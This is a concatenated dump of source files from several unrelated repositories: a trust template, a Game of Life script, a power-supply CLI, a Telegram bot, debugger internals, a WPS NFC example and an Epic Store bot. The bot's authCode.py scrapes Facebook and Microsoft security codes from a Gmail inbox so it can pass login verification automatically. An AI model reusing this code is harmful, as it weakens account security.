"executedViolations": "Unknown Type: double",
"nonPredictedViolations": "Unknown Type: double",
"consideredOffers": "Unknown Type: double",
"totalOffers": "Unknown Type: double",
"consideredOfferLocation": "Unknown Type: double",
"totalOfferLocation": "Unknown Type: double",
"managedOfferViolations": "Unknown Type: double",
"predictedOfferViolations": "Unknown Type: double",
"executedOfferViolations": "Unknown Type: double",
"nonPredictedOfferViolations": "Unknown Type: double",
"interactionNumber": "int",
"totalInteractionNumber": "int",
"feedbackNumber": "int",
"feedbackOfferNumber": "int",
"location": "Barcelona, Spain",
},
"indirect_parameters": {
"recommendation_weighting": "Unknown Type: double",
},
"offerDID": {
"type": "string"
}
},
"trustee": {
"trusteeDID": "string",
"offerDID": {
"type": "string"
},
"trusteeSatisfaction": "double"
},
"trust_value": "double",
"currentInteractionNumber": "int",
"evaluation_criteria": "Inter-domain",
"initEvaluationPeriod": "Unknown Type: timestamp",
"endEvaluationPeriod": "Unknown Type: timestamp"
}
return general_JSON
def trustTemplate3(self):
"""This methods introduces the general Trust template that will be used for MongoDB in order to retrieve objects
with the fields ordered """
general_JSON = {
"trustor": {
"trustorDID": 1,
"trusteeDID": 1,
"credibility": 1,
"transactionFactor": 1,
"communityFactor": 1,
"trust_propagation": 1,
"trust_update": 1,
"trust_evaluation": 1,
"direct_parameters": {
"direct_weighting": 1,
"userSatisfaction": 1,
"providerSatisfaction": 1,
"PSWeighting": 1,
"offerSatisfaction": 1,
"OSWeighting": 1,
"providerReputation": 1,
"offerReputation": 1,
"availableAssets": 1,
"totalAssets": 1,
"availableAssetLocation": 1,
"totalAssetLocation": 1,
"managedViolations": 1,
"predictedViolations": 1,
"executedViolations": 1,
"nonPredictedViolations": 1,
"consideredOffers": 1,
"totalOffers": 1,
"consideredOfferLocation": 1,
"totalOfferLocation": 1,
"managedOfferViolations": 1,
"predictedOfferViolations": 1,
"executedOfferViolations": 1,
"nonPredictedOfferViolations": 1,
"interactionNumber": 1,
"totalInteractionNumber": 1,
"feedbackNumber": 1,
"feedbackOfferNumber": 1,
"location": 1,
"validFor": 1
},
"indirect_parameters": {
"recommendation_weighting": 1,
"recommendations": 1
},
"offerDID": {
"type": 1
}
},
"trustee": {
"trusteeDID": 1,
"recommendation": {
"recommender": 1,
"trust_level": 1,
"location": 1
},
"offerDID": {
"type": 1
},
"trusteeSatisfaction": 1
},
"trust_value": 1,
"currentInteractionNumber": 1,
"evaluation_criteria": 1,
"initEvaluationPeriod": 1,
"endEvaluationPeriod": 1
}
return general_JSON
``` |
{
"source": "5h00T/LifeGame_py",
"score": 4
} |
#### File: 5h00T/LifeGame_py/LifeGame.py
```python
class Cell():
def __init__(self, alive):
self.alive = alive
def LifeGameInit(cells_per_line, alive_probability):
"""
Parameters
----------
cells_per_line : int
一列当たりのセルの数
alive_probability : float
生存セルの確率
Returns
--------
cells : list[sells_per_line+2][sells_per_line+2]
Cellクラスのリスト
"""
import random
return [[Cell(True if (random.random() < alive_probability and not (col == 0 or row == 0 or col == cells_per_line+1 or row == cells_per_line+1 )) else False) for col in range(cells_per_line+2)] for row in range(cells_per_line+2)]
def UpdateCellStatus(cells, cells_per_line):
"""
セルの状態を更新する
Parameters
----------
cells : list
更新する細胞
cells_per_line : int
一列当たりのセルの数
Returns
-------
new_cells : list
更新後の細胞
"""
import copy
    new_cells = copy.deepcopy(cells)
    # Surrounded by dummy cells, so indices start from 1
for col in range(1, cells_per_line+1):
for row in range(1, cells_per_line+1):
alive_cells = 0
for i in range(-1, 2):
for j in range(-1, 2):
if cells[col+i][row+j].alive == True and not (i == 0 and j == 0):
alive_cells += 1
            if alive_cells == 3 and cells[col][row].alive == False:
                new_cells[col][row].alive = True
            elif alive_cells <= 1 or alive_cells >= 4:
                new_cells[col][row].alive = False
    return new_cells
def print_cells(cells, alive_cell="■", dead_cell="□"):
"""
    Print the state of the cells
"""
for i in cells[1:-1]:
for j in i[1:-1]:
print(alive_cell if j.alive else dead_cell, end="")
        print()  # newline
if __name__=="__main__":
import time
import subprocess
cells_per_line = 50
    alive_probability = 0.5
    cells = LifeGameInit(cells_per_line, alive_probability)
while True:
subprocess.call("clear")
print_cells(cells, "o", "M")
time.sleep(1)
cells = UpdateCellStatus(cells, cells_per_line)
``` |
{
"source": "5H3LL3H5/hm310p",
"score": 2
} |
#### File: src/hm310p_cli/console.py
```python
import click
# project imports
from . import __version__
from .hm310p import HM310P
from .hm310p_constants import PowerState
iMinA = 0.0
iMaxA = 10.0
uMinV = 0.0
uMaxV = 32.0
@click.command()
@click.option("-p", "--port", type=str, help="Serial device", required=True)
@click.option(
"-s",
"--powerstate",
type=click.Choice(["on", "off"], case_sensitive=False),
help="Power supply switch",
required=True,
)
@click.option(
"-V",
"--vout",
type=click.FloatRange(uMinV, uMaxV),
help="Output voltage in Volt",
required=True,
)
@click.option(
"--ovp",
type=click.FloatRange(uMinV, uMaxV),
help="Over voltage protection value in Volt",
required=False,
)
@click.option(
"-I",
"--iout",
type=click.FloatRange(iMinA, iMaxA),
help="Output current in Ampere",
required=True,
)
@click.option(
"--ocp",
type=click.FloatRange(iMinA, iMaxA),
help="Over current protection value in Ampere",
required=False,
)
@click.option("-D", "--debug", is_flag=True)
@click.version_option(version=__version__)
def main(
port: str,
powerstate: str,
vout: float,
ovp: float,
iout: float,
ocp: float,
debug: bool,
) -> None:
"""The hm310p command line interface"""
adaptedOVP = ""
adaptedOCP = ""
if ovp is None:
"""ovp value five percent higher than vout value"""
ovp = 1.05 * vout
adaptedOVP = " => OVP not given, set 5% larger than Vout"
if ovp > uMaxV:
ovp = uMaxV
adaptedOVP = f" => OVP not given, clipped to {uMaxV:02.3f} V"
if ocp is None:
"""ocp value five percent higher than iout value"""
ocp = 1.05 * iout
adaptedOCP = " => OCP not given, set 5% larger than Iout"
if ocp > iMaxA:
ocp = iMaxA
adaptedOCP = f" => OCP not given, clipped to {iMaxA:02.3f} A"
if ovp < vout:
raise click.BadOptionUsage("ovp", f"OVP={ovp:02.3f} V < Vout={vout:02.3f} V")
if ocp < iout:
raise click.BadOptionUsage("ocp", f"OCP={ocp:02.3f} A < Iout={iout:02.3f} A")
if debug:
click.secho("Welcome to the hm310p command line interface.", fg="green")
click.echo(f"Port\t\t: {port}")
click.echo(f"Powerstate\t: {powerstate}")
click.echo(f"Vout\t\t: {vout:02.3f} V")
click.echo(f"OVP\t\t: {ovp:02.3f} V" + adaptedOVP)
click.echo(f"Iout\t\t: {iout:02.3f} A")
click.echo(f"OCP\t\t: {ocp:02.3f} A" + adaptedOCP)
psupply = HM310P(port, 1)
if powerstate == "on":
psupply.set_opp()
print(f"OPP: {psupply.get_opp():2.3f}")
# Iocp = 0.750 A, Iout = 0.5 A, Uout = 24 V, Uovp = 24.05 V
psupply.set_ocp(ocp)
psupply.set_current(iout)
psupply.set_ovp(ovp)
psupply.set_voltage(vout, "Preset")
psupply.get_voltage("Output")
psupply.get_voltage("Protection")
psupply.set_opp(iout * vout)
print(f"OPP CONSOLE: {psupply.get_opp():2.3f}")
psupply.set_powerstate(PowerState.On)
psupply.set_voltage_and_current_of_channel_list(
["Output", "Preset", "Protection", "M1", "M2", "M3", "M4", "M5", "M6"],
10.10,
5.555,
)
else:
psupply.set_voltage(0)
psupply.set_current(0)
psupply.set_powerstate(PowerState.Off)
``` |
{
"source": "5h4d0w4rt/cotd-telegram-bot",
"score": 2
} |
#### File: cotd/plugins/cringer.py
```python
import functools
import random
import typing
import telegram
import telegram.ext
from cotd.cacher import MediaCache
from cotd.plugins.helpers import cacheable_handler, is_reply, logged_context
from cotd.static import StaticReader
@logged_context
def iscringe(
update: telegram.Update,
context: telegram.ext.CallbackContext,
cache: typing.Type[MediaCache] = None,
data: typing.Type[StaticReader] = None,
) -> telegram.Message:
if not is_reply(update):
return context.bot.send_message(
chat_id=update.effective_chat.id,
text='Can"t see cringe though, reply to a cringe post',
)
@functools.partial(cacheable_handler, key="<KEY>", path="video.file_id")
@logged_context
def _process_based(
update: telegram.Update,
context: telegram.ext.CallbackContext,
cache: typing.Type[MediaCache] = None,
data: typing.Type[StaticReader] = None,
) -> telegram.Message:
return context.bot.send_video(
chat_id=update.effective_chat.id,
reply_to_message_id=update.message.reply_to_message.message_id,
video=cache.ribnikov or data.ribnikov,
)
@functools.partial(cacheable_handler, key="sniff_dog", path="photo[0].file_id")
@logged_context
def _process_cringe(
update: telegram.Update,
context: telegram.ext.CallbackContext,
cache: typing.Type[MediaCache] = None,
data: typing.Type[StaticReader] = None,
) -> telegram.Message:
return context.bot.send_photo(
chat_id=update.effective_chat.id,
reply_to_message_id=update.message.reply_to_message.message_id,
photo=cache.sniff_dog or data.sniff_dog,
)
choice_map = {"based": _process_based, "cringe": _process_cringe}
return choice_map[random.choice(["based", "cringe"])](update, context, cache=cache, data=data)
```
#### File: cotd/plugins/helpers.py
```python
import functools
import logging
import telegram
import telegram.ext
import typing
import io
from PIL import Image, ImageDraw, ImageFont
def logged_context(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
old_factory = logging.getLogRecordFactory()
def _record_factory(*args, **kwargs):
"""Make function print wrapped function's name instead of a wrapper"""
record = old_factory(*args, **kwargs)
record.funcName = f.__name__
return record
dispatcher: telegram.ext.Dispatcher = args[1].dispatcher
logging.setLogRecordFactory(_record_factory)
dispatcher.logger.debug(args)
dispatcher.logger.debug(kwargs)
dispatcher.logger.debug(dispatcher.bot_data)
dispatcher.logger.debug(dispatcher.chat_data)
dispatcher.logger.debug(dispatcher.user_data)
result = f(*args, **kwargs)
dispatcher.logger.debug(f"{f.__name__} : {result}")
logging.setLogRecordFactory(old_factory)
return result
return wrapper
def cacheable_handler(f, key: typing.Any, path: str):
@functools.wraps(f)
def wrapper(*args, **kwargs):
if "cache" not in kwargs:
return f(*args, **kwargs)
cache = kwargs["cache"]
result = f(*args, **kwargs)
        if not getattr(cache, key, None):
setattr(cache, key, functools.reduce(getattr, path.split("."), result))
return result
return wrapper
def is_reply(update: telegram.Update):
try:
update.message.reply_to_message.message_id
except AttributeError:
return False
else:
return True
# TODO: fontsize for small text
def make_image(image, text: str, pos: str) -> io.BytesIO:
width, heigh = 0, 0 # init
fontsize = 10 # starting font size
img_fraction = 0.50 # portion of image width you want text width to be
font = ImageFont.truetype("static/lobster.ttf", fontsize, encoding="unic")
while font.getsize(text)[0] < img_fraction * image.size[0]:
# iterate until the text size is just larger than the criteria
fontsize += 1
font = ImageFont.truetype("static/lobster.ttf", fontsize, encoding="unic")
image_editable = ImageDraw.Draw(image)
W, H = image.size
w, h = image_editable.textsize(text, font)
if pos == "bottom":
width = (W - w) / 2
heigh = (H - h) / 1.01
else:
width = (W - w) / 2
heigh = h / 5
# some color const
# TODO: move out to const
msg_color = "#FFFFFF"
shadow_color = "#121212"
# add shadow
image_editable.text((width - 2, heigh), text, font=font, fill=shadow_color)
image_editable.text((width + 2, heigh), text, font=font, fill=shadow_color)
image_editable.text((width, heigh - 2), text, font=font, fill=shadow_color)
image_editable.text((width, heigh + 2), text, font=font, fill=shadow_color)
# add text
image_editable.text((width, heigh), text, font=font, fill=msg_color)
# fake save
bio = io.BytesIO()
bio.name = "image.jpeg"
image.save(bio, "JPEG")
bio.seek(0)
return bio
```
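A minimal usage sketch for `make_image` above; it assumes the bundled `static/lobster.ttf` font and the `static/motivator.jpg` image used elsewhere in the repository are available.

```python
from PIL import Image

# Render a caption onto the motivator template and get an in-memory JPEG back.
with Image.open("static/motivator.jpg") as template:
    jpeg_buffer = make_image(template, "just one more refactor", pos="top")
# jpeg_buffer is an io.BytesIO that can be passed directly to bot.send_photo(...).
```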
#### File: cotd/plugins/motivationv2.py
```python
import io
import typing
import uuid
import ratelimit
import telegram
import telegram.ext
from cotd.plugins.helpers import make_image
from PIL import Image
ONE_SECOND = 1
def motivation_inline(
update: telegram.Update, context: telegram.ext.CallbackContext
) -> telegram.InlineQueryResultCachedPhoto:
db = context.dispatcher._cotd_db
query = update.inline_query.query
if query == "":
return
motivation_image = make_image(Image.open("static/motivator.jpg"), query, "top")
msg = context.bot.send_photo(
chat_id=db,
photo=motivation_image,
)
photo_id = msg.photo[0].file_id
context.bot.delete_message(chat_id=db, message_id=msg.message_id)
return telegram.InlineQueryResultCachedPhoto(
id=str(uuid.uuid4()),
title="CachedPhoto",
photo_file_id=photo_id,
)
```
#### File: cotd-telegram-bot/cotd/service.py
```python
import argparse
import logging
import typing
from dataclasses import dataclass
import telegram
import telegram.ext
import cotd.storage
@dataclass
class Options(argparse.Namespace):
log_level: str
version: str
group: int
mode: str
db: int
@dataclass
class Flags(argparse.Namespace):
feature_enable_security: bool
feature_enable_persistence: bool
@dataclass
class EnvConfig:
token: str
@dataclass
class TGBotMetadata:
user: telegram.User
@dataclass
class COTDBotStickers:
sticker_set: telegram.StickerSet
sticker_set_file_ids: typing.List[str]
@dataclass
class HandlerGroup:
group_index: int
handlers: typing.List[telegram.ext.Handler]
@dataclass
class TGBotConfig:
updater: telegram.ext.Updater
options: Options
persistence: telegram.ext.DictPersistence
metadata: TGBotMetadata
handlers: typing.List[HandlerGroup]
commands: typing.List[telegram.BotCommand]
@dataclass
class COTDBotConfig:
features: Flags
logger: logging.Logger
class TGBotClient:
def __init__(self, config: TGBotConfig):
self.options = config.options
self.updater = config.updater
self.metadata = config.metadata
self.commands = config.commands
self.handlers = config.handlers
self.persistence = config.persistence
def set_dispatcher_handlers(self) -> None:
for handler_group in self.handlers:
for handler in handler_group.handlers:
self.updater.dispatcher.add_handler(handler, group=handler_group.group_index)
def set_commands(self) -> None:
self.updater.bot.set_my_commands(self.commands)
def run(self) -> None:
self.updater.start_polling()
self.updater.idle()
def set_secure_sources(self) -> None:
self.updater.dispatcher._cotd_db = self.options.db
self.updater.dispatcher._cotd_group = self.options.group
def initialize(self) -> None:
self.set_secure_sources()
self.set_dispatcher_handlers()
self.set_commands()
class COTDBotService:
def __init__(self, client: TGBotClient, config: COTDBotConfig):
self.client = client
self.logger = config.logger
self.features = config.features
def get_stickers(self) -> COTDBotStickers:
fileids = []
if not (sticker_pack := self._fetch_sticker_set()):
self._init_sticker_set()
sticker_pack = self._fetch_sticker_set()
        fileids.extend(sticker.file_id for sticker in sticker_pack.stickers)
        return COTDBotStickers(
            **{
                "sticker_set": sticker_pack,
                "sticker_set_file_ids": fileids,
            }
        )
def _init_sticker_set(self) -> bool:
return self.client.updater.bot.create_new_sticker_set(
png_sticker=open("static/smileyOne512x512.png", "rb"),
name=f"VC_by_{self.client.metadata.user.username}",
title=f"VC_by_{self.client.metadata.user.username}",
user_id=int(145043750),
emojis="🙂😊",
)
def _fetch_sticker_set(self) -> telegram.StickerSet:
try:
return self.client.updater.bot.get_sticker_set(
f"VC_by_{self.client.metadata.user.username}"
)
except telegram.error.BadRequest as err:
raise err
@property
def stickers(self):
return self.get_stickers()
def factory(
envs: EnvConfig,
features: Flags,
options: Options,
client_logger: logging.Logger,
cotd_logger: logging.Logger,
commands: typing.List[telegram.BotCommand],
handlers: typing.List[HandlerGroup],
storage: cotd.storage.TelegramSavedMessagesStorage,
) -> COTDBotService:
storage: cotd.storage.TelegramSavedMessagesStorage | cotd.storage.TelegramSavedMessagesStorageDev = (
storage
if features.feature_enable_persistence
else cotd.storage.TelegramSavedMessagesStorageDev(options.db)
)
bot = telegram.ext.ExtBot(
token=envs.token,
defaults=telegram.ext.Defaults(
parse_mode="HTML",
disable_notification=True,
disable_web_page_preview=True,
timeout=5.0,
),
)
updater = telegram.ext.Updater(
bot=bot,
use_context=True,
persistence=storage,
workers=1,
)
updater.logger = client_logger
updater.dispatcher.logger = client_logger
metadata = TGBotMetadata(updater.bot.get_me())
tg_bot_client = TGBotClient(
TGBotConfig(
updater=updater,
options=options,
metadata=metadata,
handlers=handlers,
commands=commands,
persistence=storage,
)
)
return COTDBotService(
tg_bot_client, config=COTDBotConfig(features=features, logger=cotd_logger)
)
``` |
{
"source": "5h4d0wb0y/dotfiles",
"score": 2
} |
#### File: pydevd/_pydevd_bundle/pydevd_net_command_factory_json.py
```python
import os
from _pydev_bundle._pydev_imports_tipper import TYPE_IMPORT, TYPE_CLASS, TYPE_FUNCTION, TYPE_ATTR, \
TYPE_BUILTIN, TYPE_PARAM
from _pydev_bundle.pydev_is_thread_alive import is_thread_alive
from _pydev_bundle.pydev_override import overrides
from _pydevd_bundle._debug_adapter import pydevd_schema
from _pydevd_bundle.pydevd_comm_constants import CMD_THREAD_CREATE, CMD_RETURN, CMD_MODULE_EVENT, \
CMD_WRITE_TO_CONSOLE
from _pydevd_bundle.pydevd_constants import get_thread_id, dict_values
from _pydevd_bundle.pydevd_net_command import NetCommand
from _pydevd_bundle.pydevd_net_command_factory_xml import NetCommandFactory
from _pydevd_bundle.pydevd_utils import get_non_pydevd_threads
from _pydev_imps._pydev_saved_modules import threading
from _pydevd_bundle._debug_adapter.pydevd_schema import ModuleEvent, ModuleEventBody, Module, \
OutputEventBody, OutputEvent
from functools import partial
import itertools
import pydevd_file_utils
class ModulesManager(object):
def __init__(self):
self._lock = threading.Lock()
self._modules = {}
self._next_id = partial(next, itertools.count(0))
def track_module(self, filename_in_utf8, module_name, frame):
'''
:return list(NetCommand):
Returns a list with the module events to be sent.
'''
if filename_in_utf8 in self._modules:
return []
module_events = []
with self._lock:
# Must check again after getting the lock.
if filename_in_utf8 in self._modules:
return
version = frame.f_globals.get('__version__', '')
package_name = frame.f_globals.get('__package__', '')
module_id = self._next_id()
module = Module(module_id, module_name, filename_in_utf8)
if version:
module.version = version
if package_name:
# Note: package doesn't appear in the docs but seems to be expected?
module.kwargs['package'] = package_name
module_event = ModuleEvent(ModuleEventBody('new', module))
module_events.append(NetCommand(CMD_MODULE_EVENT, 0, module_event, is_json=True))
self._modules[filename_in_utf8] = module.to_dict()
return module_events
def get_modules_info(self):
'''
:return list(Module)
'''
with self._lock:
return dict_values(self._modules)
class NetCommandFactoryJson(NetCommandFactory):
'''
Factory for commands which will provide messages as json (they should be
similar to the debug adapter where possible, although some differences
are currently Ok).
Note that it currently overrides the xml version so that messages
can be done one at a time (any message not overridden will currently
use the xml version) -- after having all messages handled, it should
no longer use NetCommandFactory as the base class.
'''
def __init__(self):
NetCommandFactory.__init__(self)
self.modules_manager = ModulesManager()
@overrides(NetCommandFactory.make_thread_created_message)
def make_thread_created_message(self, thread):
# Note: the thread id for the debug adapter must be an int
# (make the actual id from get_thread_id respect that later on).
msg = pydevd_schema.ThreadEvent(
pydevd_schema.ThreadEventBody('started', get_thread_id(thread)),
)
return NetCommand(CMD_THREAD_CREATE, 0, msg, is_json=True)
@overrides(NetCommandFactory.make_list_threads_message)
def make_list_threads_message(self, seq):
threads = []
for thread in get_non_pydevd_threads():
if is_thread_alive(thread):
thread_schema = pydevd_schema.Thread(id=get_thread_id(thread), name=thread.getName())
threads.append(thread_schema.to_dict())
body = pydevd_schema.ThreadsResponseBody(threads)
response = pydevd_schema.ThreadsResponse(
request_seq=seq, success=True, command='threads', body=body)
return NetCommand(CMD_RETURN, 0, response, is_json=True)
@overrides(NetCommandFactory.make_get_completions_message)
def make_get_completions_message(self, seq, completions, qualifier, start):
COMPLETION_TYPE_LOOK_UP = {
TYPE_IMPORT: pydevd_schema.CompletionItemType.MODULE,
TYPE_CLASS: pydevd_schema.CompletionItemType.CLASS,
TYPE_FUNCTION: pydevd_schema.CompletionItemType.FUNCTION,
TYPE_ATTR: pydevd_schema.CompletionItemType.FIELD,
TYPE_BUILTIN: pydevd_schema.CompletionItemType.KEYWORD,
TYPE_PARAM: pydevd_schema.CompletionItemType.VARIABLE,
}
qualifier = qualifier.lower()
qualifier_len = len(qualifier)
targets = []
for completion in completions:
label = completion[0]
if label.lower().startswith(qualifier):
completion = pydevd_schema.CompletionItem(
label=label, type=COMPLETION_TYPE_LOOK_UP[completion[3]], start=start, length=qualifier_len)
targets.append(completion.to_dict())
body = pydevd_schema.CompletionsResponseBody(targets)
response = pydevd_schema.CompletionsResponse(
request_seq=seq, success=True, command='completions', body=body)
return NetCommand(CMD_RETURN, 0, response, is_json=True)
def _format_frame_name(self, fmt, initial_name, module_name, line, path):
if fmt is None:
return initial_name
frame_name = initial_name
if fmt.get('module', False):
if module_name:
if initial_name == '<module>':
frame_name = module_name
else:
frame_name = '%s.%s' % (module_name, initial_name)
else:
basename = os.path.basename(path)
basename = basename[0:-3] if basename.lower().endswith('.py') else basename
if initial_name == '<module>':
frame_name = '%s in %s' % (initial_name, basename)
else:
frame_name = '%s.%s' % (basename, initial_name)
if fmt.get('line', False):
frame_name = '%s : %d' % (frame_name, line)
return frame_name
@overrides(NetCommandFactory.make_get_thread_stack_message)
def make_get_thread_stack_message(self, py_db, seq, thread_id, topmost_frame, fmt, must_be_suspended=False):
frames = []
module_events = []
if topmost_frame is not None:
frame_id_to_lineno = {}
try:
# : :type suspended_frames_manager: SuspendedFramesManager
suspended_frames_manager = py_db.suspended_frames_manager
info = suspended_frames_manager.get_topmost_frame_and_frame_id_to_line(thread_id)
if info is None:
# Could not find stack of suspended frame...
if must_be_suspended:
return None
else:
# Note: we have to use the topmost frame where it was suspended (it may
# be different if it was an exception).
topmost_frame, frame_id_to_lineno = info
for frame_id, frame, method_name, filename_in_utf8, lineno in self._iter_visible_frames_info(
py_db, topmost_frame, frame_id_to_lineno
):
module_name = frame.f_globals.get('__name__', '')
module_events.extend(self.modules_manager.track_module(filename_in_utf8, module_name, frame))
presentation_hint = None
if not getattr(frame, 'IS_PLUGIN_FRAME', False): # Never filter out plugin frames!
if not py_db.in_project_scope(filename_in_utf8):
if py_db.get_use_libraries_filter():
continue
presentation_hint = 'subtle'
formatted_name = self._format_frame_name(fmt, method_name, module_name, lineno, filename_in_utf8)
frames.append(pydevd_schema.StackFrame(
frame_id, formatted_name, lineno, column=1, source={
'path': filename_in_utf8,
'sourceReference': pydevd_file_utils.get_client_filename_source_reference(filename_in_utf8),
},
presentationHint=presentation_hint).to_dict())
finally:
topmost_frame = None
for module_event in module_events:
py_db.writer.add_command(module_event)
response = pydevd_schema.StackTraceResponse(
request_seq=seq,
success=True,
command='stackTrace',
body=pydevd_schema.StackTraceResponseBody(stackFrames=frames, totalFrames=len(frames)))
return NetCommand(CMD_RETURN, 0, response, is_json=True)
@overrides(NetCommandFactory.make_io_message)
def make_io_message(self, v, ctx):
category = 'stdout' if int(ctx) == 1 else 'stderr'
body = OutputEventBody(v, category)
event = OutputEvent(body)
return NetCommand(CMD_WRITE_TO_CONSOLE, 0, event, is_json=True)
``` |
{
"source": "5H4D0W-C0D3R/epic_store_bot",
"score": 3
} |
#### File: epic_store_bot/lib/authCode.py
```python
import smtplib
import imaplib
import time
import email
import re
from .config import Config
config = Config()
class Getmail:
def __init__(self):
time.sleep(60)
self.FROM_EMAIL = config['gmail']['email']
self.FROM_PWD = config['gmail']['app_password']
self.SMTP_SERVER = "imap.gmail.com"
self.SMTP_PORT = 993
self.COND = [
['"Facebook" <<EMAIL>>', 'Your Facebook Security Code'],
['Microsoft account team <<EMAIL>>', 'Microsoft account security code']
]
def send_mails(self):
pass
def get_mails(self, s):
try:
mail = imaplib.IMAP4_SSL(self.SMTP_SERVER)
mail.login(self.FROM_EMAIL,self.FROM_PWD)
mail.select('inbox')
type, data = mail.search(None, 'ALL')
mail_ids = data[0]
id_list = mail_ids.split()
first_email_id = int(id_list[0])
latest_email_id = int(id_list[-1])
for i in range(latest_email_id,first_email_id, -1):
typ, data = mail.fetch(str(i), "(RFC822)" )
for response_part in data:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part[1])
if msg['From'] == self.COND[s][0] and msg['subject'] == self.COND[s][1]:
if msg.is_multipart():
for part in msg.walk():
try:
if part.get_content_type() == "text/html":
hmsg = part.get_payload(decode=True).decode()
except Exception as error:
print(error)
email_subject = msg['subject']
email_from = msg['from']
print('From : ' + email_from + '\n')
print('Subject : ' + email_subject + '\n')
return str(re.findall(r">\d+<", hmsg)[0].strip("><"))
except Exception as e:
print(str(e))
def get_code(self, meth):
if meth == "facebook":
code = self.get_mails(0)
elif meth == "xbox":
code = self.get_mails(1)
return str(code)
```
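A minimal usage sketch for the `Getmail` class above (note that the constructor sleeps for 60 seconds and expects valid Gmail credentials in the configuration):

```python
# Fetch the latest Facebook security code from the configured inbox.
mail = Getmail()                   # waits 60 s, then loads credentials from config
code = mail.get_code("facebook")   # or "xbox" for the Microsoft account code
print(code)
```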
#### File: epic_store_bot/lib/cronJob.py
```python
import requests
import re
from .config import Config
from .pgdb import Dtabase as db
config = Config()
class CronJob:
def __init__(self):
t = db().get_dta('bot_config')
h, m = divmod((t['hour'] * 60 + t['minute']) - 5, 60)
session = requests.session()
data = {
"login": {
"action": "login",
"email": config['cronjob']['email'],
"pw": config['cronjob']['password']
},
"add": {
"action": "add",
"title": config['cronjob']['yourappname'],
"url": "http://" + str(config['cronjob']['yourappname']) + ".herokuapp.com/",
"exec_mode": "day_time",
"day_time_hour": h,
"day_time_minute": m,
"notify_disable": "on"
},
"edit": {
"action": "save",
"title": config['cronjob']['yourappname'],
"url": "http://" + str(config['cronjob']['yourappname']) + ".herokuapp.com/",
"exec_mode": "day_time",
"day_time_hour": h,
"day_time_minute": m,
"timezone": t['timezone'],
"enabled": "on",
"notify_disable": "on"
}
}
session.post("https://cron-job.org/en/members/", data=data['login'])
self.session = session
self.data = data
def add(self):
self.session.post("https://cron-job.org/en/members/jobs/add/", data=self.data['add'])
def update(self):
res = self.session.post("https://cron-job.org/en/members/jobs/")
if "You did not create a cronjob yet" in res.text:
self.add()
else:
jobid = re.findall(r"jobid=\d*", res.text)[0].strip('jobid=')
print(jobid)
self.session.post("https://cron-job.org/en/members/jobs/edit/?jobid={}".format(jobid), data=self.data['edit'])
self.session.cookies.clear()
requests.delete("https://api.heroku.com/apps/epicbot488599/dynos/clock", headers={ "Accept": "application/vnd.heroku+json; version=3", "Authorization": "Bearer {}".format(config['cronjob']['api_token'])})
``` |
{
"source": "5ha5hank/wpa_supplicant",
"score": 2
} |
#### File: wpa_supplicant/examples/wps-nfc.py
```python
import os
import sys
import time
import nfc
import nfc.ndef
import nfc.llcp
import nfc.handover
import wpactrl
wpas_ctrl = '/var/run/wpa_supplicant'
def wpas_connect():
ifaces = []
if os.path.isdir(wpas_ctrl):
try:
ifaces = [os.path.join(wpas_ctrl, i) for i in os.listdir(wpas_ctrl)]
except OSError, error:
print "Could not find wpa_supplicant: ", error
return None
if len(ifaces) < 1:
print "No wpa_supplicant control interface found"
return None
for ctrl in ifaces:
try:
wpas = wpactrl.WPACtrl(ctrl)
return wpas
except wpactrl.error, error:
print "Error: ", error
pass
return None
def wpas_tag_read(message):
wpas = wpas_connect()
if (wpas == None):
return
print wpas.request("WPS_NFC_TAG_READ " + message.encode("hex"))
def wpas_get_handover_req():
wpas = wpas_connect()
if (wpas == None):
return None
return wpas.request("NFC_GET_HANDOVER_REQ NDEF WPS").rstrip().decode("hex")
def wpas_put_handover_sel(message):
wpas = wpas_connect()
if (wpas == None):
return
print wpas.request("NFC_RX_HANDOVER_SEL " + str(message).encode("hex"))
def wps_handover_init(peer):
print "Trying to initiate WPS handover"
data = wpas_get_handover_req()
if (data == None):
print "Could not get handover request message from wpa_supplicant"
return
print "Handover request from wpa_supplicant: " + data.encode("hex")
message = nfc.ndef.Message(data)
print "Parsed handover request: " + message.pretty()
nfc.llcp.activate(peer);
time.sleep(0.5)
client = nfc.handover.HandoverClient()
try:
print "Trying handover";
client.connect()
print "Connected for handover"
except nfc.llcp.ConnectRefused:
print "Handover connection refused"
nfc.llcp.shutdown()
client.close()
return
print "Sending handover request"
if not client.send(message):
print "Failed to send handover request"
print "Receiving handover response"
message = client._recv()
print "Handover select received"
print message.pretty()
wpas_put_handover_sel(message)
print "Remove peer"
nfc.llcp.shutdown()
client.close()
print "Done with handover"
def wps_tag_read(tag):
if len(tag.ndef.message):
message = nfc.ndef.Message(tag.ndef.message)
print "message type " + message.type
for record in message:
print "record type " + record.type
if record.type == "application/vnd.wfa.wsc":
print "WPS tag - send to wpa_supplicant"
wpas_tag_read(tag.ndef.message)
break
else:
print "Empty tag"
print "Remove tag"
while tag.is_present:
time.sleep(0.1)
def main():
clf = nfc.ContactlessFrontend()
try:
while True:
print "Waiting for a tag or peer to be touched"
while True:
general_bytes = nfc.llcp.startup({})
tag = clf.poll(general_bytes)
if tag == None:
continue
if isinstance(tag, nfc.DEP):
wps_handover_init(tag)
break
if tag.ndef:
wps_tag_read(tag)
break
if tag:
print "Not an NDEF tag - remove tag"
while tag.is_present:
time.sleep(0.1)
break
except KeyboardInterrupt:
raise SystemExit
finally:
clf.close()
raise SystemExit
if __name__ == '__main__':
main()
``` |
{
"source": "5had3z/TensorRT",
"score": 2
} |
#### File: Tacotron2/waveglow/arg_parser.py
```python
import argparse
def parse_waveglow_args(parent, add_help=False):
"""
Parse commandline arguments.
"""
parser = argparse.ArgumentParser(parents=[parent], add_help=add_help)
# misc parameters
parser.add_argument('--n-mel-channels', default=80, type=int,
help='Number of bins in mel-spectrograms')
# glow parameters
parser.add_argument('--flows', default=12, type=int,
help='Number of steps of flow')
parser.add_argument('--groups', default=8, type=int,
help='Number of samples in a group processed by the steps of flow')
parser.add_argument('--early-every', default=4, type=int,
help='Determines how often (i.e., after how many coupling layers) \
a number of channels (defined by --early-size parameter) are output\
to the loss function')
parser.add_argument('--early-size', default=2, type=int,
help='Number of channels output to the loss function')
parser.add_argument('--sigma', default=1.0, type=float,
help='Standard deviation used for sampling from Gaussian')
parser.add_argument('--segment-length', default=4000, type=int,
help='Segment length (audio samples) processed per iteration')
# wavenet parameters
wavenet = parser.add_argument_group('WaveNet parameters')
wavenet.add_argument('--wn-kernel-size', default=3, type=int,
                         help='Kernel size for dilated convolution in the affine coupling layer (WN)')
